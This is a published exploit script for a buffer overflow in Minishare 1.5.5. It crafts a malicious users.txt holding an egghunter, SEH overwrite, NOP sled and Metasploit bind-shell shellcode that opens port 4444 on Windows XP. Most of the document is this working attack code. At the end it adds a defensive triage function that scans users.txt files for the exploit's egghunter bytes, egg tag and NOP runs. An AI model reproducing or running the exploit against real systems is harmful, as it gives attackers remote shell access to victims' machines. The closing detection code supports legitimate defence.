Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
Source: vfocus.net  Author: 0v3r  Published: 2010-11-22

# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# Just rewrote the exploit using an egghunter to inject a bind shell payload
# Bug found by Chris Gabriel, credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe

egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # EGG w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
"\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
"\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
"\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
"\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
"\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
"\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
"\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
"\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
"\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
"\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
"\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
"\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
"\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
"\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
"\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
"\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
"\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
"\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
"\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
"\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
"\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
"\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
"\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
"\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
"\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
"\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
"\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
"\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
"\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
"\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
"\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
"\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
"\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
"\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
"\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
"\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
"\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
"\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
"\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
"\x4f\x4e\x36\x4b\x4f\x7a\x70\x43")

nops     = "\x90" * (386 - len(egghunter))
morenops = "\x90" * 32             # need enough NOPs to overwrite the first instance of the egg
seh      = "\xE7\x13\x40\x00"      # 0x004013E7: POP POP RET
nseh     = "\xeb\xc0\x90\x90"      # JMP SHORT -64 (0xc0 is -64): lands in the NOP sled just before the egghunter
egg      = "w00tw00t"              # the key the egghunter looks for

buff     = nops  + egghunter  +  nseh + seh  + morenops + egg + shellcode

#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]

try:
    # write the crafted buffer as the users.txt file Minishare parses at startup
    f = open("users.txt", 'w')
    f.write(buff)
    f.close()

    print "\n"
    print "\t---------------------------------------------------------------------------------"
    print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
    print "\t---------------------------------------------------------------------------------"
    print "\n"

    print "\t- File 'users.txt' created..."
    print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n"
except IOError:
    print "\t-Oooops! Can't write file 'users.txt'...\n"
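A defender-side triage check for the buffer layout described in the comments above, added here as an example and not part of the original exploit or of Minishare. It scans a users.txt blob for the markers this layout leaves behind (an entry longer than the 386-byte SEH offset, the egghunter's leading bytes, the w00tw00t egg tag, a NOP run); the two sample files are constructed.

```python
import re
from typing import List

# Signatures taken from the exploit listing above: the opening bytes of the
# NtAccessCheckAndAuditAlarm egghunter stub and the 8-byte egg tag it hunts for.
EGGHUNTER_PREFIX = b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E"
EGG_TAG = b"w00tw00t"
# Per the layout comment above, the SEH record sits 386 bytes into the entry;
# any users.txt line that long has already overwritten the handler.
SEH_OFFSET = 386
NOP_SLED = re.compile(rb"\x90{16,}")  # 16+ consecutive NOPs is a constructed threshold


def triage_users_txt(data: bytes) -> List[str]:
    """Return human-readable findings for a Minishare users.txt blob.
    An empty list means nothing in the file resembled this overflow."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        if len(line) > SEH_OFFSET:
            findings.append("line %d: entry is %d bytes, exceeds SEH offset %d"
                            % (lineno, len(line), SEH_OFFSET))
        if EGGHUNTER_PREFIX in line:
            findings.append("line %d: egghunter stub at offset %d"
                            % (lineno, line.find(EGGHUNTER_PREFIX)))
        if EGG_TAG in line:
            findings.append("line %d: egg tag %r at offset %d"
                            % (lineno, EGG_TAG, line.find(EGG_TAG)))
        m = NOP_SLED.search(line)
        if m:
            findings.append("line %d: NOP sled of %d bytes at offset %d"
                            % (lineno, m.end() - m.start(), m.start()))
    return findings


# Constructed samples: an ordinary credentials file, and one shaped like the
# layout above (NOP filler, hunter prefix, padding, more NOPs, egg tag; no shellcode).
BENIGN = b"admin:s3cret\nguest:guest\n"
SUSPICIOUS = b"\x90" * 354 + EGGHUNTER_PREFIX + b"A" * 20 + b"\x90" * 32 + EGG_TAG

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, triage_users_txt(blob) or ["clean"])
```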
